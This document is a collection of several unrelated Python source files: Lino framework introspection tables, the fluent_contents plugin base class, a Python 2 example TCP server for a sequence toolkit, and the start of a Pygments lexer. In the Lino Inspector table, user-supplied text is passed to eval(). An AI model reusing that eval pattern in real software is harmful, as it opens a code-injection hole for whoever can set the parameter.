self.assertEqual(mock.sentinel.temporary_file, tmp_file)
self.assertFalse(mock_delete.called)
mock_delete.assert_called_once_with(mock.sentinel.temporary_file)
|
|
# Copyright 2012-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
import re
from html import escape
import types
import datetime
from etgen.html import E
from django.db import models
from django.conf import settings
from lino.utils.report import EmptyTable
from lino.utils import AttrDict
from lino.core.utils import get_models
from lino.utils.code import codefiles, SourceFile
from lino.utils import join_elems
from lino.api import rt, dd, _
# from .mixins import Searchable
from .roles import SiteSearcher
from .choicelists import TimeZones
class Models(dd.VirtualTable):
label = _("Models")
# column_defaults = dict(width=8)
# column_names = "app name verbose_name docstring rows"
column_names = "app name fields #docstring tables rows detail_action_column"
detail_layout = """
app name docstring rows
about.FieldsByModel
"""
display_mode = 'html'
@classmethod
def get_data_rows(self, ar):
# user_type = ar.get_user().user_type
for model in get_models():
if True:
# print model
yield model
@classmethod
def summary_row(cls, ar, obj, **kw):
return [str(obj._meta.verbose_name_plural)]
@dd.displayfield(_("app_label"))
def app(self, obj, ar):
return obj._meta.app_label
@dd.displayfield(_("name"))
def name(self, obj, ar):
return obj.__name__
@dd.displayfield(_("Detail Action"))
def detail_action_column(self, obj, ar):
if obj.get_default_table().detail_action is None:
return ''
return obj.get_default_table().detail_action.full_name()
@dd.displayfield(_("Tables"))
def tables(self, obj, ar):
# tables = obj._lino_slaves.values()
def fmt(tbl):
url = tbl.__module__ + '.' + tbl.__name__
return E.a(tbl.__name__, href=url)
return join_elems([fmt(tbl) for tbl in obj._lino_tables])
# return obj.get_default_table().detail_action.full_name()
# @dd.displayfield(_("verbose name"))
# def vebose_name(self,obj,ar):
# return unicode(obj._meta.vebose_name)
@dd.displayfield(_("docstring"))
def docstring(self, obj, ar):
return obj.__doc__
# return restify(unicode(obj.__doc__))
@dd.requestfield(_("Rows"))
def rows(self, obj, ar):
return obj.get_default_table().request(
user=ar.get_user(), renderer=ar.renderer)
@dd.displayfield(_("Fields"))
def fields(self, obj, ar):
return ' '.join([f.name for f in obj._meta.get_fields()])
class FieldsByModel(dd.VirtualTable):
label = _("Fields")
# master_key = "model"
# master = Models
column_names = "name verbose_name help_text_column"
@classmethod
def get_data_rows(self, ar):
model = ar.master_instance
if model:
for (fld, remote) in model._meta.get_fields_with_model():
yield fld
@dd.displayfield(_("name"))
def name(self, fld, ar):
return fld.name
@dd.displayfield(_("verbose name"))
def verbose_name(self, fld, ar):
return str(fld.vebose_name)
@dd.displayfield(_("help text"))
def help_text_column(self, obj, ar):
# return obj.__doc__
return restify(str(obj.help_text))
class Inspected(object):
def __init__(self, parent, prefix, name, value):
self.parent = parent
self.prefix = prefix
self.name = name
self.value = value
class Inspector(dd.VirtualTable):
"""
Shows a simplistic "inspector" which once helped me for debugging.
Needs more work to become seriously useful...
"""
label = _("Inspector")
required_roles = dd.login_required(dd.SiteStaff)
column_names = "i_name i_type i_value"
parameters = dict(
inspected=models.CharField(
_("Inspected object"), max_length=100, blank=True),
show_callables=models.BooleanField(_("show callables"), default=False)
)
params_layout = 'inspected show_callables'
# editable = False
# display_mode = 'html'
@classmethod
def get_inspected(self, name):
# ctx = dict(settings=settings,lino=lino)
if not name:
return settings
try:
o = eval('settings.' + name)
except Exception as e:
o = e
return o
@classmethod
def get_data_rows(self, ar):
# dd.logger.info("20120210 %s, %s",ar.quick_search,ar.param_values.inspected)
if ar.param_values.show_callables:
def flt(v):
return True
else:
def flt(v):
if isinstance(v, (
types.FunctionType,
types.GeneratorType,
types.UnboundMethodType,
types.UnboundMethodType,
types.BuiltinMethodType,
types.BuiltinFunctionType
)):
return False
return True
o = self.get_inspected(ar.param_values.inspected)
# print(20170207, o)
if isinstance(o, (list, tuple)):
for i, v in enumerate(o):
k = "[" + str(i) + "]"
yield Inspected(o, '', k, v)
elif isinstance(o, AttrDict):
for k, v in list(o.items()):
yield Inspected(o, '.', k, v)
elif isinstance(o, dict):
for k, v in list(o.items()):
k = "[" + repr(k) + "]"
yield Inspected(o, '', k, v)
elif isinstance(o, type) and issubclass(o, models.Model):
for fld in o._meta.get_fields():
k = "._meta.get_field('" + fld.name + "')"
yield Inspected(o, '', fld.name, fld)
else:
for k in dir(o):
if not k.startswith('__'):
if not ar.quick_search or (
ar.quick_search.lower() in k.lower()):
v = getattr(o, k)
if flt(v):
# if not inspect.isbuiltin(v) and not inspect.ismethod(v):
# if ar.param_values.show_callables or not inspect.isfunction(v):
# if isinstance(v,types.FunctionType ar.param_values.show_callables or not callable(v):
yield Inspected(o, '.', k, v)
# for k,v in o.__dict__.items():
# yield Inspected(o,k,v)
@dd.displayfield(_("Name"))
def i_name(self, obj, ar):
pv = dict()
if ar.param_values.inspected:
pv.update(inspected=ar.param_values.inspected +
obj.prefix + obj.name)
else:
pv.update(inspected=obj.name)
# newreq = ar.spawn(ar.ui,user=ar.user,renderer=ar.renderer,param_values=pv)
# newreq = ar.spawn_request(param_values=pv)
# return ar.href_to_request(newreq, obj.name)
return obj.name
@dd.displayfield(_("Value"))
def i_value(self, obj, ar):
return escape(str(obj.value), quote=False)
@dd.displayfield(_("Type"))
def i_type(self, obj, ar):
return escape(str(type(obj.value)), quote=False)
class SourceFiles(dd.VirtualTable):
label = _("Source files")
column_names = 'module_name code_lines doc_lines'
@classmethod
def get_data_rows(self, ar):
for name, filename in codefiles('lino*'):
yield SourceFile(name, filename)
@dd.virtualfield(models.IntegerField(_("Code")))
def code_lines(self, obj, ar):
return obj.count_code
@dd.virtualfield(models.IntegerField(_("doc")))
def doc_lines(self, obj, ar):
return obj.count_doc
@dd.virtualfield(models.CharField(_("module name")))
def module_name(self, obj, ar):
return obj.modulename
|
|
"""
Internal module for the plugin system,
the API is exposed via __init__.py
"""
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from future.builtins import str
from future.utils import with_metaclass
from django.conf import settings
from django.contrib import admin
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import context_processors
from django.contrib.auth import context_processors as auth_context_processors
from django.contrib.messages import context_processors as messages_context_processors
from django.core.cache import cache
from django.db import DatabaseError
from django.forms import Media, MediaDefiningClass
from django.template.context import Context
from django.template.loader import render_to_string
from django.utils.html import linebreaks, escape
from django.utils.translation import ugettext as _, get_language
from fluent_contents.cache import get_rendering_cache_key, get_placeholder_cache_key
from fluent_contents.forms import ContentItemForm
from fluent_contents.models import ContentItemOutput, ImmutableMedia, DEFAULT_TIMEOUT
# Some standard request processors to use in the plugins,
# Naturally, you want STATIC_URL to be available in plugins.
def _add_debug(request):
return {'debug': settings.DEBUG}
_STANDARD_REQUEST_CONTEXT_PROCESSORS = (
context_processors.request,
context_processors.static,
context_processors.csrf,
context_processors.media,
context_processors.i18n,
auth_context_processors.auth,
messages_context_processors.messages,
_add_debug,
)
class PluginContext(Context):
"""
A template Context class similar to :class:`~django.template.context.RequestContext`, that enters some pre-filled data.
This ensures that variables such as ``STATIC_URL`` and ``request`` are available in the plugin templates.
"""
def __init__(self, request, dict=None, current_app=None):
# If there is any reason to site-global context processors for plugins,
# I'd like to know the usecase, and it could be implemented here.
Context.__init__(self, dict, current_app=current_app)
for processor in _STANDARD_REQUEST_CONTEXT_PROCESSORS:
self.update(processor(request))
def frontend_media_property(cls):
# Identical to the media_property, adapted to read the "FrontendMedia" class
# and optimized to avoid useless object creation.
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.frontend_media
except AttributeError:
base = ImmutableMedia.empty_instance
# Get the media definition for this class
definition = getattr(cls, 'FrontendMedia', None)
if definition:
media = Media(definition)
# Not supporting extend=('js',) here, not documented in Django either.
if getattr(definition, 'extend', True) and base is not ImmutableMedia.empty_instance:
return base + media
return media
else:
return base
return property(_media)
class PluginMediaDefiningClass(MediaDefiningClass):
"Metaclass for classes that can have media definitions"
def __new__(cls, name, bases, attrs):
new_class = super(PluginMediaDefiningClass, cls).__new__(cls, name, bases, attrs)
if 'frontend_media' not in attrs and 'FrontendMedia' in attrs:
new_class.frontend_media = frontend_media_property(new_class)
return new_class
class ContentPlugin(with_metaclass(PluginMediaDefiningClass, object)):
"""
The base class for all content plugins.
A plugin defines the rendering for a :class:`~fluent_contents.models.ContentItem`, settings and presentation in the admin interface.
To create a new plugin, derive from this class and call :func:`plugin_pool.register <PluginPool.register>` to enable it.
For example:
.. code-block:: python
from fluent_contents.extensions import plugin_pool, ContentPlugin
@plugin_pool.register
class AnnouncementBlockPlugin(ContentPlugin):
model = AnnouncementBlockItem
render_template = "plugins/announcementblock.html"
category = _("Simple blocks")
As minimal configuration, specify the :attr:`model` and :attr:`render_template` fields.
The :attr:`model` should be a subclass of the :class:`~fluent_contents.models.ContentItem` model class.
.. note::
When the plugin is registered in the :attr:`plugin_pool`, it will be instantiated only once.
It is therefore not possible to store per-request state at the plugin object.
This is similar to the behavior of the :class:`~django.contrib.admin.ModelAdmin` classes in Django.
To customize the admin, the :attr:`admin_form_template` and :attr:`form` can be defined.
Some well known properties of the :class:`~django.contrib.admin.ModelAdmin` class can also be specified on plugins;
such as:
* :attr:`~django.contrib.admin.ModelAdmin.fieldsets`
* :attr:`~django.contrib.admin.ModelAdmin.filter_horizontal`
* :attr:`~django.contrib.admin.ModelAdmin.filter_vertical`
* :attr:`~django.contrib.admin.ModelAdmin.prepopulated_fields`
* :attr:`~django.contrib.admin.ModelAdmin.radio_fields`
* :attr:`~django.contrib.admin.ModelAdmin.raw_id_fields`
* :attr:`~django.contrib.admin.ModelAdmin.readonly_fields`
* A ``class Media`` to provide extra CSS and JavaScript files for the admin interface.
The rendered output of a plugin is cached by default, assuming that most content is static.
This also avoids extra database queries to retrieve the model objects.
In case the plugin needs to output content dynamically, include ``cache_output = False`` in the plugin definition.
"""
# -- Settings to override:
#: The model to use, must derive from :class:`fluent_contents.models.ContentItem`.
model = None
#: The form to use in the admin interface. By default it uses a :class:`fluent_contents.models.ContentItemForm`.
form = ContentItemForm
#: The template to render the admin interface with
admin_form_template = "admin/fluent_contents/contentitem/admin_form.html"
#: An optional template which is included in the admin interface, to initialize components (e.g. JavaScript)
admin_init_template = None
#: The fieldsets for the admin view.
fieldsets = None
#: The template to render the frontend HTML output.
render_template = None
#: By default, rendered output is cached, and updated on admin changes.
cache_output = True
#: .. versionadded:: 0.9
#: Cache the plugin output per :django:setting:`SITE_ID`.
cache_output_per_site = False
#: .. versionadded:: 1.0
#: Cache the plugin output per language.
#: This can be useful for sites which either:
#:
#: * Display fallback content on pages, but still use ``{% trans %}`` inside templates.
#: * Dynamically switch the language per request, and *share* content between multiple languages.
#:
#: This option does not have to be used for translated CMS pages,
#: as each page can have it's own set of :class:`~fluent_contents.models.ContentItem` objects.
#: It's only needed for rendering the *same* item in different languages.
cache_output_per_language = False
#: .. versionadded: 1.0
#: Set a custom cache timeout value
cache_timeout = DEFAULT_TIMEOUT
#: .. versionadded:: 1.0
#: Tell which languages the plugin will cache.
#: It defaults to the language codes from the :django:setting:`LANGUAGES` setting.
cache_supported_language_codes = [code for code, _ in settings.LANGUAGES]
#: The category title to place the plugin into.
#: This is only used for the "Add Plugin" menu.
category = None
#: .. versionadded:: 1.0
#: By default, the plugin is rendered in the :attr:`language_code` it's written in.
#: It can be disabled explicitly in case the content should be rendered language agnostic.
#: For plugins that cache output per language, this will be done already.
#:
#: See also: :attr:`cache_output_per_language`
render_ignore_item_language = False
#: Alternative template for the view.
ADMIN_TEMPLATE_WITHOUT_LABELS = "admin/fluent_contents/contentitem/admin_form_without_labels.html"
#: .. versionadded:: 0.8.5
#: The ``HORIZONTAL`` constant for the :attr:`radio_fields`.
HORIZONTAL = admin.HORIZONTAL
#: .. versionadded:: 0.8.5
#: The ``VERTICAL`` constant for the :attr:`radio_fields`.
VERTICAL = admin.VERTICAL
#: The fields to display as raw ID
raw_id_fields = ()
#: The fields to display in a vertical filter
filter_vertical = ()
#: The fields to display in a horizontal filter
filter_horizontal = ()
#: The fields to display as radio choice. For example::
#:
#: radio_fields = {
#: 'align': ContentPlugin.VERTICAL,
#: }
#:
#: The value can be :attr:`ContentPlugin.HORIZONTAL` or :attr:`ContentPlugin.VERTICAL`.
radio_fields = {}
#: Fields to automatically populate with values
prepopulated_fields = {}
#: Overwritten formfield attributes, e.g. the 'widget'. Allows both the class and fieldname as key.
formfield_overrides = {}
#: The fields to display as readonly.
readonly_fields = ()
def __init__(self):
self._type_id = None
def __repr__(self):
return '<{0} for {1} model>'.format(self.__class__.__name__, self.model.__name__)
@property
def verbose_name(self):
"""
The title for the plugin, by default it reads the ``verbose_name`` of the model.
"""
return self.model._meta.verbose_name
@property
def name(self):
"""
Return the classname of the plugin, this is mainly provided for templates.
This value can also be used in :func:`PluginPool`.
"""
return self.__class__.__name__
@property
def type_name(self):
"""
Return the classname of the model, this is mainly provided for templates.
"""
return self.model.__name__
@property
def type_id(self):
"""
Shortcut to retrieving the ContentType id of the model.
"""
if self._type_id is None:
try:
self._type_id = ContentType.objects.get_for_model(self.model).id
except DatabaseError as e:
raise DatabaseError("Unable to fetch ContentType object, is a plugin being registered before the initial syncdb? (original error: {0})".format(str(e)))
return self._type_id
def get_model_instances(self):
"""
Return the model instances the plugin has created.
"""
return self.model.objects.all()
def _render_contentitem(self, request, instance):
# Internal wrapper for render(), to allow updating the method signature easily.
# It also happens to really simplify code navigation.
result = self.render(request=request, instance=instance)
if isinstance(result, ContentItemOutput):
# Return in new 1.0 format
# Also include the statically declared FrontendMedia, inserted before any extra added files.
# These could be included already in the ContentItemOutput object, but duplicates are removed.
media = self.get_frontend_media(instance)
if media is not ImmutableMedia.empty_instance:
result._insert_media(media)
return result
elif isinstance(result, (HttpResponseRedirect, HttpResponsePermanentRedirect)):
# Can't return a HTTP response from a plugin that is rendered as a string in a template.
# However, this response can be translated into our custom exception-based redirect mechanism.
return self.redirect(result['Location'], result.status_code)
else:
# Old 0.9 syntax, wrap it.
# The 'cacheable' is implied in the rendering already, but this is just for completeness.
media = self.get_frontend_media(instance)
return ContentItemOutput(result, media, cacheable=self.cache_output, cache_timeout=self.cache_timeout)
def get_output_cache_base_key(self, placeholder_name, instance):
"""
.. versionadded:: 1.0
Return the default cache key, both :func:`get_output_cache_key` and :func:`get_output_cache_keys` rely on this.
By default, this function generates the cache key using :func:`~fluent_contents.cache.get_rendering_cache_key`.
"""
return get_rendering_cache_key(placeholder_name, instance)
def get_output_cache_key(self, placeholder_name, instance):
"""
.. versionadded:: 0.9
Return the default cache key which is used to store a rendered item.
By default, this function generates the cache key using :func:`get_output_cache_base_key`.
"""
cachekey = self.get_output_cache_base_key(placeholder_name, instance)
if self.cache_output_per_site:
cachekey = "{0}-s{1}".format(cachekey, settings.SITE_ID)
# Append language code
if self.cache_output_per_language:
# NOTE: Not using self.language_code, but using the current language instead.
# That is what the {% trans %} tags are rendered as after all.
# The render_placeholder() code can switch the language if needed.
user_language = get_language()
if user_language not in self.cache_supported_language_codes:
user_language = 'unsupported'
cachekey = "{0}.{1}".format(cachekey, user_language)
return cachekey
def get_output_cache_keys(self, placeholder_name, instance):
"""
.. versionadded:: 0.9
Return the possible cache keys for a rendered item.
This method should be overwritten when implementing a function :func:`set_cached_output` method
or when implementing a :func:`get_output_cache_key` function.
By default, this function generates the cache key using :func:`get_output_cache_base_key`.
"""
base_key = self.get_output_cache_base_key(placeholder_name, instance)
cachekeys = [
base_key,
]
if self.cache_output_per_site:
site_ids = list(Site.objects.values_list('pk', flat=True))
if settings.SITE_ID not in site_ids:
site_ids.append(settings.SITE_ID)
base_key = get_rendering_cache_key(placeholder_name, instance)
cachekeys = ["{0}-s{1}".format(base_key, site_id) for site_id in site_ids]
if self.cache_output_per_language or self.render_ignore_item_language:
# Append language code to all keys,
# have to invalidate a lot more items in memcache.
# Also added "None" suffix, since get_parent_language_code() may return that.
# TODO: ideally for render_ignore_item_language, only invalidate all when the fallback language changed.
total_list = []
cache_languages = list(self.cache_supported_language_codes) + ['unsupported', 'None']
# All variants of the Placeholder (for full page caching)
placeholder = instance.placeholder
total_list.extend(get_placeholder_cache_key(placeholder, lc) for lc in cache_languages)
# All variants of the ContentItem in different languages
for user_language in cache_languages:
total_list.extend("{0}.{1}".format(base, user_language) for base in cachekeys)
cachekeys = total_list
return cachekeys
def get_cached_output(self, placeholder_name, instance):
"""
.. versionadded:: 0.9
Return the cached output for a rendered item, or ``None`` if no output is cached.
This method can be overwritten to implement custom caching mechanisms.
By default, this function generates the cache key using :func:`get_output_cache_key`
and retrieves the results from the configured Django cache backend (e.g. memcached).
"""
cachekey = self.get_output_cache_key(placeholder_name, instance)
return cache.get(cachekey)
def set_cached_output(self, placeholder_name, instance, output):
"""
.. versionadded:: 0.9
Store the cached output for a rendered item.
This method can be overwritten to implement custom caching mechanisms.
By default, this function generates the cache key using :func:`~fluent_contents.cache.get_rendering_cache_key`
and stores the results in the configured Django cache backend (e.g. memcached).
When custom cache keys are used, also include those in :func:`get_output_cache_keys`
so the cache will be cleared when needed.
.. versionchanged:: 1.0
The received data is no longer a HTML string, but :class:`~fluent_contents.models.ContentItemOutput` object.
"""
cachekey = self.get_output_cache_key(placeholder_name, instance)
if self.cache_timeout is not DEFAULT_TIMEOUT:
cache.set(cachekey, output, self.cache_timeout)
else:
# Don't want to mix into the default 0/None issue.
cache.set(cachekey, output)
def render(self, request, instance, **kwargs):
"""
The rendering/view function that displays a plugin model instance.
:param instance: An instance of the ``model`` the plugin uses.
:param request: The Django :class:`~django.http.HttpRequest` class containing the request parameters.
:param kwargs: An optional slot for any new parameters.
To render a plugin, either override this function, or specify the :attr:`render_template` variable,
and optionally override :func:`get_context`.
It is recommended to wrap the output in a ``<div>`` tag,
to prevent the item from being displayed right next to the previous plugin.
.. versionadded:: 1.0
The function may either return a string of HTML code,
or return a :class:`~fluent_contents.models.ContentItemOutput` object
which holds both the CSS/JS includes and HTML string.
For the sake of convenience and simplicity, most examples
only return a HTML string directly.
When the user needs to be redirected, simply return a :class:`~django.http.HttpResponseRedirect`
or call the :func:`redirect` method.
To render raw HTML code, use :func:`~django.utils.safestring.mark_safe` on the returned HTML.
"""
render_template = self.get_render_template(request, instance, **kwargs)
if not render_template:
return str(_(u"{No rendering defined for class '%s'}" % self.__class__.__name__))
context = self.get_context(request, instance, **kwargs)
return self.render_to_string(request, render_template, context)
def render_to_string(self, request, template, context, content_instance=None):
"""
Render a custom template with the :class:`~PluginContext` as context instance.
"""
if not content_instance:
content_instance = PluginContext(request)
return render_to_string(template, context, context_instance=content_instance)
def render_error(self, error):
"""
A default implementation to render an exception.
"""
return '<div style="color: red; border: 1px solid red; padding: 5px;">' \
'<p><strong>%s</strong></p>%s</div>' % (_('Error:'), linebreaks(escape(str(error))))
def redirect(self, url, status=302):
"""
.. versionadded:: 1.0
Request a redirect to be performed for the user.
Usage example:
.. code-block:: python
def get_context(self, request, instance, **kwargs):
context = super(IdSearchPlugin, self).get_context(request, instance, **kwargs)
if request.method == "POST":
form = MyForm(request.POST)
if form.is_valid():
self.redirect("/foo/")
else:
form = MyForm()
context['form'] = form
return context
To handle redirects, :class:`fluent_contents.middleware.HttpRedirectRequestMiddleware`
should be added to the :django:setting:`MIDDLEWARE_CLASSES`.
"""
raise HttpRedirectRequest(url, status=status)
def get_render_template(self, request, instance, **kwargs):
"""
Return the template to render for the specific model `instance` or `request`,
By default it uses the ``render_template`` attribute.
"""
return self.render_template
def get_context(self, request, instance, **kwargs):
"""
Return the context to use in the template defined by ``render_template`` (or :func:`get_render_template`).
By default, it returns the model instance as ``instance`` field in the template.
"""
return {
'instance': instance,
}
@property
def frontend_media(self):
"""
.. versionadded:: 1.0
The frontend media, typically declared using a ``class FrontendMedia`` definition.
"""
# By adding this property, frontend_media_property() is further optimized.
return ImmutableMedia.empty_instance
def get_frontend_media(self, instance):
"""
Return the frontend media for a specific instance.
By default, it returns ``self.frontend_media``, which derives
from the ``class FrontendMedia`` of the plugin.
"""
return self.frontend_media
class HttpRedirectRequest(Exception):
"""
.. versionadded:: 1.0
Request for a redirect from within a view.
"""
def __init__(self, url, status=302):
super(HttpRedirectRequest, self).__init__(
"A redirect to '{0}' was requested by a plugin.\n"
"Please add 'fluent_contents.middleware.HttpRedirectRequestMiddleware' "
"to MIDDLEWARE_CLASSES to handle redirects by plugins.".format(url)
)
self.url = url
self.status = status
|
|
# Copyright Dave Trollope 2014
# This source code is not to be distributed without agreement from
# D. Trollope
#
# This example demonstrates how to code up a simple sequence server
# which accepts connections using the TCP data flow module,
# manages a service group and responds to sequences
# from a client.
# System imports
import getopt, sys, time, random
# Sequence Toolkit imports - stk_env must be first
from stk_env import *
from stk_options import *
from stk_service_group import *
from stk_service import *
from stk_tcp_server import *
from stk_data_flow import *
from stk_sg_automation import *
# Add a handler for CTRL-C to gracefully exit
import signal
import sys
ending = 0
def signal_handler(signal, frame):
global ending
if ending > 0:
sys.exit(0)
ending += 1
stkbase.stop_dispatcher()
stkbase.terminate_dispatcher()
signal.signal(signal.SIGINT, signal_handler)
# Class to collect command line options
# command line options provided - set in process_cmdline()
class cmdopts:
group_name = "Simple Server Service Group"
quiet = False
bind_ip = "0.0.0.0"
bind_port = "29312"
monitor_ip = "127.0.0.1"
monitor_port = "20001"
monitor_protocol = "tcp"
name_server_ip = "127.0.0.1"
name_server_port = "20002"
name_server_protocol = "tcp"
opts = cmdopts()
# Process command line options
def process_cmdline():
try:
gopts, args = getopt.getopt(sys.argv[1:], "hqG:B:m:R:", ["help", "quiet", "group-name="])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
for o, a in gopts:
if o in ("-q", "--quiet"):
opts.quiet = True
elif o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-B"):
bind_ip = a.split(':')
opts.bind_ip = bind_ip[0]
if bind_ip.count == 2:
opts.bind_port = bind_ip[1]
elif o in ("-G", "--group-name"):
opts.group_name = a
elif o in ("-m"):
p=stk_protocol_def_t()
a=stk_data_flow_parse_protocol_str(p,a)
if p.ip != '':
opts.monitor_ip = p.ip
if p.port != '':
opts.monitor_port = p.port
if p.protocol != '':
opts.monitor_protocol = p.protocol
elif o in ("-R"):
p=stk_protocol_def_t()
a=stk_data_flow_parse_protocol_str(p,a)
if p.ip != '':
opts.name_server_ip = p.ip
if p.port != '':
opts.name_server_port = p.port
if p.protocol != '':
opts.name_server_protocol = p.protocol
def usage():
print("Usage: simple_server.py [options]")
print(" -h : This help!")
print(" -q : Quiet")
print(" -B ip[:port] : IP and port to be bound (default: 0.0.0.0:29312)")
print(" -G <name> : Group Name for services")
print(" -m <[protocol:]ip[:port]> : IP and port of monitor")
print(" -R <[protocol:]ip[:port]> : IP and port of name server")
# Process command line options
process_cmdline()
# The following are used during cleanup
df = None
df_opts = None
svcgrp = None
svcgrp_opts = None
stkbase = None
envopts = None
dispatcher_cbs = None
service_cbs = None
def cleanup():
try:
# destroy the data flow, sequence, service group and environment
if df:
df.close()
if df_opts:
df_opts.remove_dispatcher_fd_cbs()
df_opts.close()
if svcgrp:
svcgrp.close()
if svcgrp_opts:
stk_service_group.remove_service_cb_option(stkbase,svcgrp_opts,service_cbs)
svcgrp_opts.remove_data_flow("listening_data_flow")
svcgrp_opts.close()
# Close the callback objects
if service_cbs:
service_cbs.close()
# And get rid of the environment, we are done!
if stkbase:
stkbase.close()
if dispatcher_cbs:
#dispatcher_cbs.caller().close()
dispatcher_cbs.close()
if envopts:
# Now free the options that were built
# Because there was nested options, we must free each nest individually
# because there is no stored indication which options are nested
envopts.remove_dispatcher_wakeup_cb()
nsopts = envopts.find_option("name_server_options")
stk_env.remove_name_server_dispatcher_cbs(nsopts,"name_server_data_flow")
nsopts.free_sub_option("name_server_data_flow_options")
stk_env.remove_monitoring_dispatcher_cbs(envopts,"monitoring_data_flow")
envopts.free_sub_option("monitoring_data_flow_options")
envopts.free_sub_option("name_server_options")
envopts.close()
except Exception, e:
print "Exception occurred cleaning up: " + str(e)
# Create the STK environment - can't do anything without one
# By configuring the IP/Port of the monitoring service when we create the environment
# all services created within it will automatically use the monitoring service unless
# overridden.
opts_dict = {
"name_server_options": {
"name_server_data_flow_protocol": opts.name_server_protocol,
"name_server_data_flow_options": {
"data_flow_name": """%(protocol)s name server socket for simple_server""" % {"protocol": opts.name_server_protocol },
"data_flow_id": 10000,
"destination_address": opts.name_server_ip,
"destination_port": opts.name_server_port
}
},
"monitoring_data_flow_protocol": opts.monitor_protocol,
"monitoring_data_flow_options": {
"data_flow_name": """%(protocol)s monitoring socket for simple_server""" % {"protocol": opts.monitor_protocol },
"data_flow_id": 10001,
"destination_address": opts.monitor_ip,
"destination_port": opts.monitor_port,
"nodelay": 1
}
}
envopts = stk_options(opts_dict)
# Let the environment automatically add and remove fds for these data flows to the dispatcher
stk_env.append_name_server_dispatcher_cbs(envopts,"name_server_data_flow")
stk_env.append_monitoring_dispatcher_cbs(envopts,"monitoring_data_flow")
# Create an STK environment. Since we are using the example listening dispatcher,
# set an option for the environment to ensure the dispatcher wakeup API is called.
envopts.append_dispatcher_wakeup_cb()
stkbase = stk_env(envopts)
# Class containing callbacks for services (added, removed and changing state)
class app_service_cb(stk_callback):
def __init__(self):
stk_callback.__init__(self)
def close(self):
stk_callback.close(self)
def added_cb(self,svcgrp,svc,state): # Service added callback
print "Service " + svc.name() + " added to service group " + svcgrp.name() + " [state " + str(state) + "]"
def removed_cb(self,svcgrp,svc,state): # Service removed callback
print "Service " + svc.name() + " removed from service group " + svcgrp.name() + " [state " + str(state) + "]"
def state_change_cb(self,svc,old_state,new_state): # Service changing state callback
old_state_str = svc.state_str(old_state);
new_state_str = svc.state_str(new_state);
print "Service '" + svc.name() + "' changed from state " + str(old_state_str) + " to " + str(new_state_str);
def smartbeat_cb(self,svcgrp,svc,smartbeat):
try:
print "Service '" + svc.name() + "' group '" + svcgrp.name() + "' smartbeat received, checkpoint " + str(smartbeat.checkpoint())
except Exception, e:
print str(e)
# Class containing callbacks for the dispatcher - this is how we receive data
class dispatcher_cb(stk_callback):
def __init__(self):
stk_callback.__init__(self)
def close(self):
stk_callback.close(self)
def process_seq_segment(self,seq,data,user_type,clientd):
if opts.quiet == False:
print "Sequence " + str(seq.id()) + " Received " + str(len(data)) + " bytes of type " + str(user_type)
if len(data) >= 4:
sz = len(data)
print 'Bytes: %02x %02x %02x %02x ... %02x %02x %02x %02x' % (ord(data[0]),ord(data[1]),ord(data[2]),ord(data[3]),ord(data[sz - 4]),ord(data[sz - 3]),ord(data[sz - 2]),ord(data[sz - 1]))
num = 0
def process_data(self,rcvchannel,rcv_seq): # Callback to receive data
try:
if rcv_seq.type() != STK_SEQUENCE_TYPE_DATA:
svcgrp.invoke(rcv_seq)
if opts.quiet == False:
print "data flow " + str(rcvchannel.id()) + ": Number of elements in received sequence: " + str(rcv_seq.count()) + " Sequence type: " + str(rcv_seq.type())
if rcv_seq.type() != STK_SEQUENCE_TYPE_DATA:
return
# Call process_seq_segment() on each element in the sequence
rcv_seq.iterate(self.process_seq_segment,None)
except Exception, e:
print "Exception occurred processing received data: " + str(e)
try:
ret_seq = stk_sequence(rcv_seq.env(),"simple_server_return_data",0x7edcba90,STK_SEQUENCE_TYPE_DATA,STK_SERVICE_TYPE_DATA,None)
retbuf = []
i = 0
while i < 10:
retbuf.append(i)
i += 1
ret_seq.copy_array_to(retbuf,self.__class__.num);
self.__class__.num += 1
rcvchannel.send(ret_seq,STK_TCP_SEND_FLAG_NONBLOCK)
except Exception, e:
print "Exception occurred returning data: " + str(e)
def process_name_response(self,rcvchannel,rcv_seq): # Callback to receive name info
pass
try:
# Create the options for the server data flow
print "Creating server data flow"
df_opts_dict = {
"bind_address": opts.bind_ip,
"bind_port": opts.bind_port,
"nodelay": 1,
"send_buffer_size": 800000,
"receive_buffer_size": 16000000,
"reuseaddr": 1
}
df_opts = stk_options(df_opts_dict)
df_opts.append_dispatcher_fd_cbs(None)
# Create the TCP server data flow (aka a listening socket)
df = stk_tcp_server(stkbase,"tcp server socket for simple_server", 29190, df_opts)
if df == None:
print "Failed to create the server data flow"
cleanup()
sys.exit(5)
except Exception, e:
print "Exception occurred trying to create server data flow: " + str(e)
cleanup()
sys.exit(5)
print "Server data flow created"
try:
# Create service callbacks object and add to service group options
service_cbs = app_service_cb()
svcgrp_opts = stk_options("")
svcgrp_opts.append_data_flow("listening_data_flow",df)
svccb = stk_service_group.add_service_cb_option(stkbase,svcgrp_opts,service_cbs)
# Create the service group that client services will be added to as they are discovered.
# Also, register callbacks so we can be notified when services are added and removed.
svcgrp = stk_service_group(stkbase, opts.group_name, 1000, svcgrp_opts)
except Exception, e:
print "Exception occurred trying to create service group: " + str(e)
cleanup()
sys.exit(5)
try:
# Run the example listening dispatcher to accept data flows from clients
# and receive data from them. This example does this inline, but an
# application might choose to invoke this on another thread.
#
# The dispatcher only returns when a shutdown is detected.
dispatcher_cbs = dispatcher_cb()
stkbase.listening_dispatcher(df,svcgrp,dispatcher_cbs)
except Exception, e:
print "Exception occurred dispatching: " + str(e)
# The dispatcher returned, cleanup everything
cleanup()
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.int_fiction
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for interactive fiction languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, \
this, default, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error, Generic
__all__ = ['Inform6Lexer', 'Inform6TemplateLexer', 'Inform7Lexer',
'Tads3Lexer']
class Inform6Lexer(RegexLexer):
"""
For `Inform 6 <http://inform-fiction.org/>`_ source code.
.. versionadded:: 2.0
"""
